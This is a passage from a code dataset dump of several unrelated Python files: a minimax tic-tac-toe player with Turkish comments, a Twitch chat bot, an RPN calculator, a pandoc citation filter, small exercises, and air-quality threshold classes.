her\n# zaman en iyi hamleyi yapmasını sağlamak mümkündür.\n\n# minimax kelimesi minimum-maximumdan türemiştir. sıfır kazançlı yani bir tarafın kazanmasının,\n# diğer tarafın kaybetmesi anlamına gelen ve sonuçta sıfır toplamla bitan oyunlarda, oyun sonunun\n# öngörülmesi için kullanılan bir algoritmadır. satranç, go, tictactoe gibi masa oyunları, sıfır\n# kazançlı oyunların güzel örneklerindendir. algoritmayı anlamak için önce bir minimax ağacı çizmek\n# gerekir. örnek bir ağaç üzerinden durumu daha iyi anlatabiliriz.\n# | O | O | X | # hamle sırası Xte iken 3 adet boş kare yani\n# İncelenen Konum (1) | X | | O | # Xin yapabileceği 3 adet hamle vardır.\n# | | | X |\n# | | |\n# / | \\\n# ----------------- | ----------------------\n# | | |\n# | O | O | X | | O | O | X | | O | O | X | # O'nun hamle sırasında\n# X oynar | X | X | O | (2) | X | | O | (3) | X | | O | (4) # oynayabileceği 2 kare\n# | | | X | | | X | X | | X | | X | # kalmıştır. yani her bir\n# / \\ / \\ / \\ # dal için ikişer dal daha\n# | | | | | | # iner\n# O |O|O|X| |O|O|X| |O|O|X| |O|O|X| |O|O|X| |O|O|X| \n# Oynar |X|X|O|(5)|X|X|O| (6) (7)|X| |O| |X|O|O|(8) (9)|X|O|O| |X| |O|(10) # her bir durumda X için bir\n# | |O|X| |O| |X| |O|X|X| | |X|X| |X| |X| |X|O|X| # hamle kalmıştır. buradan sonrası\n# | | | | | | # kazanç, kayıp veya beraberliği belirliyor.\n# X |O|O|X| |O|O|X| |O|O|X| |O|O|X| |O|O|X| |O|O|X| \n# Oynar |X|X|O| |X|X|O|->0 0<-|X|X|O| |X|O|O|->1 1<-|X|O|O| |X|X|O|->1 # şimdi bu hamlelerin hepsinde artık oyun\n# 1<-|X|O|X| |O|X|X| |O|X|X| |X|X|X| |X|X|X| |X|O|X| # bitti. bu sebeple artık incelemeye geçebiliriz\n# # burada kazanç oyunlara 1 beraberliklere 0 kayıp\n# # oyunlara -1 veriyoruz. \n# işin minimax kısmına geldik. Xin en iyi hamlesini belirlemek için ağacın en altından en üstüne doğru gitmemiz lazım. üste\n# doğru giderken eğer hamleyi yapan X ise üste maximun olan sayıyı geçiriyoruz. çünkü X kendisi için maximun kazancı hedefler.\n# fakat hamle sırası O'da ise bu sefer minimum olasılığı yukarı geçiriyoruz çünkü O'nun, X için minimum kazancı hedeflediğini\n# farzediyoruz. Son sıradan bi yukarı node'a çıkarken zaten son hamle olduğu için doğrudan aynı sayılar geçecek. yani\n# 5 => 1 | 6 => 0 | 7 => 0 | 8 => 1 | 9 => 1 ve 10 => 1 olur. O'nun oynadığı node'a geldiğimizde ise en üste çıkarken bu defa\n# minimum olanı geçiriyoruz. yani 5 ve 6dan, 2ye geçerken 0, 7 ve 8den 3e geçerken 0 ve 9 ile 10dan 4e geçerken 1i alıyoruz\n# son durumda 2 => 0 | 3 => 0 | 4 => 1 oluyor. şimdi de köke yani ilk duruma gideceğiz ve en iyi hamleyi belirleyeceğiz.\n# burada X oynar hamlesinde olduğumuz maximumu seçmemiz gerek yani 4'ü seçeceğiz. sonuç olarak 1 numaralı konumda Xin yapabi-\n# leceği en iyi hamle, 4 numaralı hamle olarak saptanmış oluyor.\n\n# puanlamaları yaparken, hamle uzunluğunu hesaba katmak da faydalı bir pratiktir. bu durumda bilgisayar, sadece kazancı değil\n# en kısa yoldan kazancı hedefleyecektir. bunu yapmak için puanlamaya bir parametre olarak hamle sayısı da eklenmelidir ki\n# kalan hamle sayısı, kalan boş kare sayısının bir fonksiyonudur. başka bir ilk konumdan yola çıkarak bir ağaç daha oluşturabiliriz\n# | X | O | X |\n# Ilk durum | X | O | |\n# | | | O |\n# | | |\n# MAXIMIZER (-2) / | \\ (0)\n# (üste maximum) -----------------/ | \\----------------------\n# / (3)| \\\n# | X | O | X | | X | O | X | | X | O | X | \n# X oynar | X | O | X | | X | O | | | X | O | |\n# | | | O | | X | | O | | | X | O |\n# MINIMIZER (0) | |(-2) UF=1*(2+1)=3 (1) | | (0)\n# (üste minimum) / \\ / \\\n# | X | O | X | | X | O | X | | X | O | X | | X | O | X |\n# O oynar | X | O | X | | X | O | X | | X | O | O | | X | O | |\n# | O | | O | | | O | O | | | X | O | | O | X | O |\n# MAXIMIZER | (0) UF=-1*(1+1)=-2 | (1) | (0)\n# (üste max) | X | O | X | | X | O | X | | X | O | X |\n# X oynar | X | O | X | | X | O | O | | X | O | X |\n# | O | X | O | | X | X | O | | O | X | O |\n# UF=0*(0+1)=0 UF=1*(0+1)=1 UF=0*(0+1)=0\n#\n# yukarıdaki karar ağacında oyun sonu için çok daha fazla olasılık var. X kaybedebilir, 1 veya 2 hamlede kazanabilir veya oyun\n# berabere bitebilir. bu gibi bir durumda, hamlelerin puanlanması için 1, 0, -1 sistemi yetersiz kalır çünkü yararı doğru şekilde\n# saptayamaz. bunun için bir yarar fonksiyonu (utility function) oluşturulmalıdır. yarar fonksiyonu, durumun kazanç veya kayıp\n# olmasını ve bu duruma kaç kaç hamlede gelindiğini içermelidir. bunun için de, konumun durumunu (1, 0 veya -1) tahtada kalan\n# boş kare sayısının 1 fazlası ile (son konumda kazancın 0 değil 1 olması için 1 fazlası) çarpmamız gerekiyor. daha sonra yukardaki\n# gibi Xin hamlelerinden maksimum, Onun hamlelerinden minimumları alarak köke kadar çıkmamız gerek.\n# yani en avantajlı hamle, bize +3 utility fonksiyonu veren hamle oluyor.\n#\n# şimdi bunu kodumuza yerleştirmemiz lazım\nclass GeniusComputerPlayer(Player):\n def __init__(self, letter):\n super().__init__(letter)\n\n def get_move(self, game):\n # eğer tüm konumlar boşsa rastgele hamle yapması yeterli. daha fazlasına gerek yok\n if len(game.available_moves()) == 9:\n choice = random.choice(game.available_moves())\n else:\n # burada ise oynanacak kareyi minimax algoritmasına göre belirlememiz lazım. bunun için minimax\n # adı verilen bi metod oluşturacağız ve bunu burada çağıracağız.\n choice = self.minimax(game, self.letter)['position'] # çıktı olarak sözlük alıyoruz pozisyon değil.\n return choice\n # def minimax(self, state, player):\n # max_player = self.letter # yourself\n # other_player = 'O' if player == 'X' else 'X'\n\n # # first we want to check if the previous move is a winner\n # if state.current_winner == other_player:\n # return {'position': None, 'score': 1 * (len(state.available_moves()) + 1) if other_player == max_player else -1 * (len(state.available_moves()) + 1)}\n # elif not state.empty_squares():\n # return {'position': None, 'score': 0}\n\n # if player == max_player:\n # best = {'position': None, 'score': -math.inf} # each score should maximize\n # else:\n # best = {'position': None, 'score': math.inf} # each score should minimize\n # for possible_move in state.available_moves():\n # state.make_move(possible_move, player)\n # sim_score = self.minimax(state, other_player) # simulate a game after making that move\n\n # # undo move\n # state.board[possible_move] = ' '\n # state.current_winner = None\n # sim_score['position'] = possible_move # this represents the move optimal next move\n\n # if player == max_player: # X is max player\n # if sim_score['score'] > best['score']:\n # best = sim_score\n # else:\n # if sim_score['score'] < best['score']:\n # best = sim_score\n # return best\n def minimax(self, state, player): # burada game yerine state dedik çünkü daha anlaşılır. metod oyunun genelini değil, oyunun\n # o an alınmış bir görüntüsünü değerlendiriyor. tamamen anlamsal yani aslında gene oyunun kendisi ama state demek daha\n # anlaşılır.\n # iki nitelik tanımlayacağız. maximum player yani biz ve other player yani rakip:\n max_player = self.letter\n other_player = 'O' if player == 'X' else 'X' # BURAYA DIKKAT! yanlışlıkla burda max_player yaptığımda rastgelenin bi tık iyisi\n # gibi oynuyodu. büyük ihtimalle ilk hamle tahmininden sonra other_player değişmediği için bu durum oluyodu.\n # öncelikle mevcut konumda bir kazanan olup olmadığını kontrol edelim ki oyun bittiyse boşa yorulmayalım:\n # minimax fonksiyonu recursive bi fonksiyon yani kendi içinde tekrarlanan bir fonksiyon ve her tekrarda max player ve other\n # player değişiyor. rakibin oynadığı pozisyonları hesaplarken rakip max player, biz ise other player olacağız. bu sebeple,\n # 137de, eğer rakip, max player ise score -1 ile çarpılmalı, değilse +1 ile çarpılmalı (ifli ifadenin sebebi)\n if state.current_winner == other_player:\n return {\n 'position': None,\n 'score': 1 * (len(state.available_moves()) + 1) if other_player == max_player else -1 * (len(state.available_moves()) + 1)\n }\n elif not state.available_moves(): # yani hiç hamle kalmamış ve current_winner yok ise yani incelenen konum berabere ise:\n return {'position': None, 'score': 0}\n # eğer kazanan yoksa ve boş kareler varsa buradan sonrasına devam edecek fonksiyon. o yüzden else koymaya gerek yok\n # zaten kısıtlayıcı durumlarda fonksiyon, uygun sözlükleri return edeceği için bitecek ve gerisi okunmayacak\n # önce temel sözlüklerimizi oluşturalım. bunlar. pozisyonu None, score'u da default olarak -sonsuz (oyuncu max player ise\n # hamle yapılmaması -sonsuz yani her halükarda küçük kalsın diye) veya +sonsuz (rakip max player ise) olarak içeren\n # sözlüklerdir. bu değerleri oyunun durumuna göre güncelleyeceğiz fonksiyonun ilerleyen aşamalarında.\n if player == max_player: # sonsuzların kullanılmasının sebebi, hamle yapılmayan koşulu\n best_choice = {'position': None, 'score': -math.inf} # her halükarda hamle yapılan koşuldan küçük veya büyük kılmak\n else: # bu sebeple max oyuncu biz isek -math.inf rakip ise +math.inf\n best_choice = {'position': None, 'score': math.inf} # oluyor. burası biraz karışık anlamak önemli\n # şimdi de tüm olası hamleleri kontrol edeceğiz. bunun için mümkün olan hamleleri yani boş konumları for döngüsüyle taramak\n # gerekir.\n for possible_move in state.available_moves():\n # bu hamleyi yapmış olduğumuzu farz edeceğiz. hatırlanacağı üzere TicTacToe sınıfında make_move fonksiyonu ile hamle\n # yapacağız:\n state.make_move(possible_move, player)\n # hamle yapıldıktan sonra score'u simüle etmemiz lazım. şimdi state üzerinde make_move çalıştırdıktan sonra artık state,\n # bu hamlenin yapıldığı konum oluyor. buradan sonra diğer oyuncuyla tekrar minimax çalıştırmamız gerekiyor. işin recursion\n # kısmı da bu kısım. minimax iki argüman alıyor: state ve player. bu sefer yeni state ile other playerı kullanacağız:\n sim_score = self.minimax(state, other_player)\n # bu recursion bittiğinde yani kazanma-kaybetme-beraberlik koşuluna kadar tarandıktan sonra pozisyonu sıfırlamamız lazım\n # ki sonraki olası hamleyi denerken ilk pozisyon hesaplansın. ayrıca kazananı da sıfırlamamız lazım.\n state.board[possible_move] = ' '\n state.current_winner = None\n # burada da sim_score sözlüğündeki pozisyon değişkenini, possible_move yapıyoruz ki sonuçta elde edilen pozisyon elemanı\n # denenen hamleyi temsil etsin:\n sim_score['position'] = possible_move\n # artık sim_score; döngüde denenen hamleyi ve hamle sonucu elde edilen score'u içeren iki elemanlı bir sözlük oldu.\n # eğer bu hamlenin score'u, mevcut hesaplanmış en iyi score'dan (best_choice) daha iyiyse bu sim_score sözlüğünü, best\n # choice yapacağız. fakar burda oyuncunun kim olduğunu da kontrol etmemiz gerek. eğer max_player biz isek, daha büyük\n # olan score'u, rakip ise daha küçük olan score'u alacağız çünkü rakip max_player iken bizim için en kötü olan hamleyi\n # yani score'u en küçük hamleyi yapacağını varsayıyoruz.\n if player == max_player:\n if sim_score['score'] > best_choice['score']:\n best_choice = sim_score\n else:\n if sim_score['score'] < best_choice['score']:\n best_choice = sim_score\n return best_choice # SONUNDA BİTTİ anlamak için bi baştan oku :'D","repo_name":"egemensahiin/trdocumentation","sub_path":"PythonWorks/Examples/basit_projeler/tiktactoeAI/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":15546,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22047722182","text":"import os\nimport logging\nimport twitchio.websocket\nimport asyncio\nimport tracemalloc\nimport json5\nimport requests\nimport vlc\nfrom flask import Flask, escape, request\n\nimport urlfetch\nimport twitchio\n\nfrom bot_helpers import *\nfrom twitchio.ext import commands\nfrom twitchio import webhook\nfrom enum import Enum\n\nfrom dotenv import load_dotenv\n\nfrom PyQt5 import QtCore\n\n\n\nclass TTSVoice(Enum):\n Brian = \"Brian\"\n Ivy = \"Ivy\"\n Justin = \"Justin\"\n\nclass SimpleCommand(object):\n def __init__(self, name, aliases, message):\n self.name = name\n self.aliases = aliases\n self.message = message\n\n async def response(self, context):\n assert isinstance(context, twitchio.Context)\n self.message = self.message.replace(\"$User\", context.message.author.name)\n for msg in self.message.splitlines():\n await context.send(msg)\n\n\nclass BotThread(QtCore.QThread):\n def __init__(self, bot):\n QtCore.QThread.__init__(self)\n self.bot = bot\n\n def run(self):\n loop = self.bot.Application.loop\n loop.run_until_complete(self.bot._ws._connect())\n\n try:\n loop.run_until_complete(self.bot._ws._listen())\n except KeyboardInterrupt:\n pass\n finally:\n self.bot._ws.teardown()\n\n\n\nclass Bot(commands.Bot):\n \n duo_partner = ''\n simple_commands = []\n skip_threshold = 2 ##todo: make this a value of current view count (25% of view count)\n skip_requests = []\n\n def __init__(self, app, args):\n self.Application = app\n self.args = args\n\n logging.info(f\"Initilalizing Bot...\")\n super().__init__(irc_token=os.getenv('TMI_TOKEN'),\n client_id=os.getenv('CLIENT_ID'),\n nick=os.getenv('BOT_NICK'),\n prefix=os.getenv('BOT_PREFIX'),\n initial_channels=[os.getenv('CHANNEL')],\n loop = self.Application.loop)\n \n logging.info(\"Connecting to channel \" + self.initial_channels[0])\n\n logging.info(f'Loading Commands')\n\n with open('commands.json5') as json_file:\n self.simple_commands = json5.load(json_file)\n\n for cmd_json in self.simple_commands:\n cmd = SimpleCommand(cmd_json['name'], cmd_json['aliases'], cmd_json['message'])\n new_cmd = commands.Command(name=cmd.name, aliases=cmd.aliases, func=cmd.response)\n self.add_command(new_cmd)\n\n logging.info(f'Commands Loaded')\n\n\n\n\n async def event_raw_pubsub(self, data):\n logging.debug(f'Raw Pubsub: {data}')\n return await super().event_raw_pubsub(data)\n \n async def event_pubsub(self, data):\n logging.debug(f'Pubsub: {data}')\n return await super().event_pubsub(data)\n\n async def event_webhook(self, data):\n logging.debug(f'Webhook Event: {data}')\n\n async def event_ready(self):\n logging.info(f'{self.nick} is online!')\n ws = self._ws # this is only needed to send messages within event_ready\n\n if (self.args.release == \"1\"):\n await ws.send_privmsg(self.initial_channels[0], f\"/me beep boop\")\n \n # topic=twitchio.StreamChanged(user_id=46526863)\n #await self.modify_webhook_subscription(mode=twitchio.WebhookMode.subscribe,\n # topic=twitchio.StreamChanged(user_id=46526863), lease_seconds=864000)\n \n await self.pubsub_subscribe(os.getenv('USER_TOKEN'), 'channel-points-channel-v1.46526863')\n \n\n async def event_message(self, message):\n assert isinstance(message, twitchio.dataclasses.Message)\n logging.info(f'[{message.author.name}]: {message.content}')\n if message.author.name.lower() == self.nick.lower():\n return\n\n headers = message.raw_data.split(\" :\")\n dictionary = StringToDict(headers[0])\n\n # custom reward logic\n if 'custom-reward-id' in dictionary.keys():\n logging.debug(f\"Custom Reward ID: {dictionary['custom-reward-id']}\")\n \n #song request\n if dictionary['custom-reward-id'] == os.getenv('SONG_REQUEST_ID'): \n\n try:\n logging.info(f\"Song Request Recieved - Adding to Queue... URL: {headers[2]}\")\n media = await self.Application.AddMedia(uri=headers[2]) # add song to vlc queue\n log_msg = f\"{message.author.name} added \\\"{media.Video.title}\\\" to queue!\"\n await self._ws.send_privmsg(self.initial_channels[0], log_msg)\n \n\n except Exception as e:\n log_msg = f\"Song Request Failed, you owe 1000 pants to {message.author} - Error {e}\"\n logging.error(log_msg)\n await self._ws.send_privmsg(self.initial_channels[0], log_msg)\n\n #tts message todo: maybe migrate to JS since you will probably want a cool little popup on screen :0\n if dictionary['custom-reward-id'] == os.getenv('TTS_REQUEST_ID'):\n logging.info(f\"TTS Message Requested... Message: {headers[2]}\")\n self.Application.AddTTSMessage(headers[2])\n \n\n\n else:\n await self.handle_commands(message)\n\n async def event_command_error(self, context, error):\n assert isinstance(context, twitchio.dataclasses.Context)\n logging.error(error)\n #await context.send(error)\n\n\n @commands.command(name='dadjoke')\n async def dadjoke(self, context):\n response = urlfetch.get('https://api.scorpstuff.com/dadjokes.php')\n await context.send(response.text)\n\n @commands.command(name='followage')\n async def followage(self, context):\n response = urlfetch.get(f'https://twitch.api.scorpstuff.com/followed.php?caster={context.channel.name}&follower={context.author.name}')\n await context.send(response.text)\n\n @commands.command(name='advice')\n async def advice(self, context):\n response = urlfetch.get('https://api.scorpstuff.com/advice.php')\n await context.send(response.text)\n\n @commands.command(name='duo')\n async def duo(self, context):\n assert isinstance(self.duo_partner, twitchio.Message)\n if len(self.duo_partner.content) == 0:\n await context.send(f'All by myself PepeHands')\n else:\n await context.send(f'I am duoing with twitch.tv/{self.duo_partner.content}')\n\n @commands.command(name='setduo', aliases=[\"set_duo, duoset, duo_set, editduo, edit_duo\"])\n @commands.check(is_mod)\n async def set_duo(self, context):\n self.duo_partner = context.message\n await context.send(f'{context.message.author.name} set duo to {self.duo_partner.content}')\n\n\n @commands.command(name='subcount')\n async def subcount(self, context):\n assert isinstance(context, twitchio.dataclasses.Context)\n stream = await context.channel.get_stream()\n logging.debug(stream)\n await context.send(f'{subcount} people have Subscribed')\n \n #### media commands ####\n\n @commands.command(name='play')\n @commands.check(is_mod)\n async def songrequest_play(self, context):\n await self.media_session.vlc_player.play()\n\n @commands.command(name='pause')\n @commands.check(is_mod)\n async def songrequest_pause(self, context):\n await self.media_session.vlc_player.pause()\n\n @commands.command(name='song')\n async def song(self, context):\n assert isinstance(context, twitchio.dataclasses.Context)\n\n pass\n\n @commands.command(name='skip')\n async def skip(self, context):\n assert isinstance(context, twitchio.dataclasses.Context)\n if self.Application.media_list_player.get_state() == vlc.State.Playing:\n if context.author in self.skip_requests:\n await context.send(f'{context.author.name} has already made a skip request!')\n else:\n self.skip_requests.append(context.author)\n if len(self.skip_requests) >= self.skip_threshold:\n self.Application.onSkipPressed()\n await context.send(f'Skipping current song!')\n return\n skip_difference = self.skip_threshold - len(self.skip_requests)\n await context.send(f'{context.author.name} has voted to skip the current song! {skip_difference} more votes required to skip')\n else:\n await context.send('No song is playing!')\n\n #####\n\n @commands.command(name='addcommand', aliases=['addcom'])\n @commands.check(is_mod)\n async def addcommand(self, context):\n assert isinstance(context, twitchio.dataclasses.Context)\n\n _, command_syntax, command_response = context.message.content.split(maxsplit=2)\n\n logging.info(f'Creating Command {command_syntax}: {command_response}')\n cmd = SimpleCommand(command_syntax, [], command_response)\n if cmd not in self.simple_commands:\n self.simple_commands.append(cmd.__dict__)\n new_cmd = commands.Command(name=cmd.name, aliases=cmd.aliases, func=cmd.response)\n self.add_command(new_cmd)\n else:\n logging.error(f'Command Already Exists!')\n return\n\n logging.info(f'Saving Command to JSON')\n with open('commands.json5', 'w') as json_file:\n json5.dump(self.simple_commands, json_file)\n\n\n\n\n @commands.command(name='help')\n async def help(self, context):\n assert isinstance(context, twitchio.dataclasses.Context)\n for cmd in self.commands:\n assert isinstance(cmd, commands.Command)\n await context.send(f\"{cmd.name}: \")\n\n\n\n @commands.command(name='ban') #???\n async def ban(self, context):\n assert isinstance(context, twitchio.dataclasses.Context)\n command_syntax, command_response = context.message.content.split(maxsplit=2)\n await context.send(f\"{command_response} has been Banned! Kappa\")\n\n\n\n","repo_name":"InclementDab/Twitch-Bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":10026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37920182855","text":"#!/usr/bin/env python3\nimport operator\nfrom datetime import datetime\nimport sys\n\nops = {\n '+': operator.add,\n '-': operator.sub,\n '^': operator.pow,\n}\n\ndef calculate(myarg):\n stack = list()\n\n\n for token in myarg.split():\n \n try:\n stack.append(int(token))\n\n except ValueError:\n \n arg2 = stack.pop()\n arg1 = stack.pop()\n function = ops[token]\n \n result = function(arg1, arg2)\n print(result)\n stack.append(result)\n\n return stack.pop()\n\ndef main():\n \n while True:\n input_text = input(\"rpn calc> \")\n result = calculate(input_text)\n\nif __name__ == '__main__':\n main()\n","repo_name":"hyunchun/c4cs-f17-rpn","sub_path":"rpn.py","file_name":"rpn.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12770850911","text":"#!/usr/bin/env python\n\n\"\"\"\nPandoc filter to citeproc-py.\n\"\"\"\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\nfrom citeproc.py2compat import *\nimport sys\nimport functools\n\n# The references are parsed from a BibTeX database, so we import the\n# corresponding parser.\nfrom citeproc.source.bibtex import BibTeX\n\n# Import the citeproc-py classes we'll use below.\nfrom citeproc import CitationStylesStyle, CitationStylesBibliography\nfrom citeproc import formatter\nfrom citeproc import Citation, CitationItem\n\nfrom pandocfilters import walk, RawInline, RawBlock, Cite, Span, Str, Para, Div, attributes\nimport json\nimport logging\n\ndef citation_register(key, value, format, meta):\n if key == 'Cite':\n citation = Citation([CitationItem(value[0][0]['citationId'])])\n bibliography.register(citation)\n citations.append(citation)\n\ndef citation_replace(key, value, format, meta):\n if key == 'Cite':\n global counter\n citation = citations[counter]\n counter = counter + 1\n bib_citation = bibliography.cite(citation, logging.warn)\n if isinstance(bib_citation, basestring):\n rendered_citation = render(bib_citation)\n else:\n rendered_citation = render(''.join(bib_citation)) # important if there's an \"et al.\", for example\n return Cite(value[0], [rendered_citation])\n\ndef value_of_metadata(result):\n result_value = result['c']\n \n if isinstance(result_value, basestring): # sometimes the value is a string (if passed as cli argument)\n return result_value\n else:\n return result_value[0]['c'] # other times it's a string inside an array (if in YAML)\n\nif __name__ == \"__main__\":\n # follows the basic model of pandocfilters toJSONFilter, but we do multiple passes\n doc = json.loads(sys.stdin.read())\n if len(sys.argv) > 1:\n format = sys.argv[1]\n else:\n format = \"\"\n \n if format in ['html', 'html5']:\n f = formatter.html\n render = functools.partial(RawInline, 'html')\n elif format == 'rst':\n f = formatter.rst\n render = Str\n else:\n f = formatter.plain\n render = Str\n \n citations = []\n counter = 0\n bibliography_path = None\n csl_path = None\n \n meta = doc[0]['unMeta']\n \n result = meta.get('bibliography', {})\n if result:\n bibliography_path = value_of_metadata(result)\n result = meta.get('csl', {})\n if result:\n csl_path = value_of_metadata(result)\n \n if bibliography_path == None or csl_path == None:\n raise Exception('Metadata variables must be set for both bibliography and csl.')\n \n # Parse the BibTeX database.\n bib_source = BibTeX(bibliography_path, encoding='utf-8')\n\n # load a CSL style\n bib_style = CitationStylesStyle(csl_path, validate=False)\n \n bibliography = CitationStylesBibliography(bib_style, bib_source, f)\n \n altered = walk(doc, citation_register, format, doc[0]['unMeta'])\n second = walk(altered, citation_replace, format, doc[0]['unMeta'])\n \n references = []\n for item, key in zip(bibliography.bibliography(), bibliography.keys):\n attrs = {'id': key, 'class':'h-cite'}\n references.append(Div(attributes(attrs),[Para([render(str(item))])]))\n \n second[1].extend(references) # add more paragraphs to the end of the main document list of blocks\n \n json.dump(second, sys.stdout)","repo_name":"npdoty/dissertation","sub_path":"paper-template/cite-filter.py","file_name":"cite-filter.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"24943214061","text":"print('give me two num, i will divide them')\nprint(\"enter 'q' to exit\")\nwhile True:\n num1 = input('first num:')\n if num1 == 'q':\n break\n num2 = input('second num:')\n if num2 == 'q':\n break\n try:\n num = int(num1)/int(num2)\n except ZeroDivisionError:\n print(\"不能除0\")\n else:\n print('sum: ' + str(num))","repo_name":"ly4515/python","sub_path":"jiChu/异常/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21147960311","text":"import sys, functools\nimport hashlib\n\ndef part1(filename):\n with open(filename) as f:\n secret = f.readline().rstrip('\\n')\n\n i = 1\n while True:\n str2hash = f\"{secret}{i}\"\n result = hashlib.md5(str2hash.encode()) \n h = result.hexdigest()\n if h[0:5] == '00000': break\n i += 1\n \n print(f\"part1 >>> Santa's lowest positive number with hx00000 is {i}\")\n\n \ndef part2(filename):\n with open(filename) as f:\n secret = f.readline().rstrip('\\n')\n\n i = 1\n while True:\n str2hash = f\"{secret}{i}\"\n result = hashlib.md5(str2hash.encode()) \n h = result.hexdigest()\n if h[0:6] == '000000': break\n i += 1\n \n print(f\"part2 >>> Santa's lowest positive number with hx000000 is {i}\")\n\n\nif __name__ == \"__main__\":\n filename = sys.argv[1]\n part1(filename)\n part2(filename)\n","repo_name":"yterradas/advent-of-code","sub_path":"2015/day04.py","file_name":"day04.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22130638656","text":"def check_guess(letter, guess):\n if guess.isalpha() == False:\n print(\"Invalid\")\n return False\n elif guess.lower() > letter.lower():\n print(\"Guess is high\")\n return False;\n elif guess.lower() < letter.lower():\n print(\"Guess is low\")\n return False\n else:\n print(\"Guess is correct\")\n return guess.lower() == letter.lower()\n\ndef letter_guess(answer_letter):\n if check_guess(answer_letter,input(\"Enter guess: \")):\n return True\n elif check_guess(answer_letter,input(\"Enter guess: \")):\n return True\n elif check_guess(answer_letter,input(\"Enter guess: \")):\n return True\n else:\n return False\n\nletter_guess(\"x\")\n","repo_name":"bebetaro/studyPython","sub_path":"Kazuma/letter_guess.py","file_name":"letter_guess.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14858858584","text":"class Threshold:\n GREEN = \"Good\"\n YELLOW = \"Fair\"\n RED = \"Poor\"\n NONE = \"N/A\"\n WHITE = \"Error\"\n\n\nclass TempThreshold:\n RED = \"Hot\"\n GREEN = \"Good\"\n BLUE = \"Cold\"\n WHITE = \"Error\"\n\n\nclass Temperature(float):\n \"\"\"Temperature is measured in celsius (°C), fahrenheit (°F) or kelvin (K).\"\"\"\n\n def __new__(cls, value):\n return super(Temperature, cls).__new__(cls, value)\n\n def __init__(self, value) -> None:\n self.celsius = value\n self.fahrenheit = self.celsius * 9 / 5 + 32\n self.kelvin = self.celsius + 273.15\n\n def threshold(self) -> str:\n if self.celsius > 50 or self.celsius < -20:\n _threshold = TempThreshold.WHITE\n elif self.celsius >= 25:\n _threshold = TempThreshold.RED\n elif self.celsius < 18:\n _threshold = TempThreshold.BLUE\n else:\n _threshold = TempThreshold.GREEN\n return _threshold\n\n\nclass Radon(float):\n \"\"\"Radon is measured in becquerels per cubic meter (Bq/m3) or picocuries per litre (pCi/L).\"\"\"\n\n def __new__(cls, value):\n return super(Radon, cls).__new__(cls, value)\n\n def __init__(self, value) -> None:\n self.becquerels = value\n self.picocuries = self.becquerels / 37\n\n def threshold(self) -> str:\n if self.becquerels <= 0 or self.becquerels >= 9000:\n _threshold = Threshold.WHITE\n elif self.becquerels >= 150:\n _threshold = Threshold.RED\n elif self.becquerels < 100:\n _threshold = Threshold.GREEN\n else:\n _threshold = Threshold.YELLOW\n return _threshold\n\n\nclass Pressure(float):\n \"\"\"Pressure is measured in hectopascals (hPa) or kilopascals (kPa).\"\"\"\n\n def __new__(cls, value):\n return super(Pressure, cls).__new__(cls, value)\n\n def __init__(self, value) -> None:\n self.hectopascals = value\n self.kilopascals = self.hectopascals / 10\n\n def threshold(self) -> str:\n if self.hectopascals < 800 or self.hectopascals > 1100:\n _threshold = Threshold.WHITE\n else:\n _threshold = Threshold.NONE\n return _threshold\n\n\nclass CO2(float):\n \"\"\"CO2 is measured in parts per million (ppm) or parts per billion (ppb).\"\"\"\n\n def __new__(cls, value):\n return super(CO2, cls).__new__(cls, value)\n\n def __init__(self, value) -> None:\n self.parts_per_million = value\n self.parts_per_billion = self.parts_per_million * 1000\n\n def threshold(self) -> str:\n if self.parts_per_million <= 0 or self.parts_per_million > 30000:\n _threshold = Threshold.WHITE\n elif self.parts_per_million >= 1000:\n _threshold = Threshold.RED\n elif self.parts_per_million < 800:\n _threshold = Threshold.GREEN\n else:\n _threshold = Threshold.YELLOW\n return _threshold\n\n\nclass VOC(float):\n \"\"\"VOC is measured in parts per billion (ppb) or parts per million (ppm).\"\"\"\n\n def __new__(cls, value):\n return super(VOC, cls).__new__(cls, value)\n\n def __init__(self, value) -> None:\n self.parts_per_billion = value\n self.parts_per_million = self.parts_per_billion / 1000\n\n def threshold(self) -> str:\n if self.parts_per_billion <= 0 or self.parts_per_billion >= 30000:\n _threshold = Threshold.WHITE\n elif self.parts_per_billion >= 2000:\n _threshold = Threshold.RED\n elif self.parts_per_billion < 250:\n _threshold = Threshold.GREEN\n else:\n _threshold = Threshold.YELLOW\n return _threshold\n\n\nclass PM(float):\n \"\"\"Particulate matter is measured in micrograms per cubic meter of air (ug/m3).\"\"\"\n\n def __new__(cls, value):\n return super(PM, cls).__new__(cls, value)\n\n def __init__(self, value) -> None:\n self.microgram_per_cubic_meter = value\n\n def threshold(self) -> str:\n if self.microgram_per_cubic_meter <= 0:\n _threshold = Threshold.WHITE\n elif self.microgram_per_cubic_meter >= 25:\n _threshold = Threshold.RED\n elif self.microgram_per_cubic_meter < 10:\n _threshold = Threshold.GREEN\n else:\n _threshold = Threshold.YELLOW\n return _threshold\n\n\nclass Humidity(float):\n \"\"\"Humidity is measured in relative humidity (%rH).\"\"\"\n\n def __new__(cls, value):\n return super(Humidity, cls).__new__(cls, value)\n\n def __init__(self, value) -> None:\n self.relative_humidity = value\n\n def threshold(self) -> str:\n if self.relative_humidity <= 0 or self.relative_humidity > 100:\n _threshold = Threshold.WHITE\n elif self.relative_humidity < 25.0 or self.relative_humidity >= 70.0:\n _threshold = Threshold.RED\n elif (self.relative_humidity < 70.0 and self.relative_humidity >= 60.0) or (\n self.relative_humidity < 30.0 and self.relative_humidity >= 25.0\n ):\n _threshold = Threshold.YELLOW\n 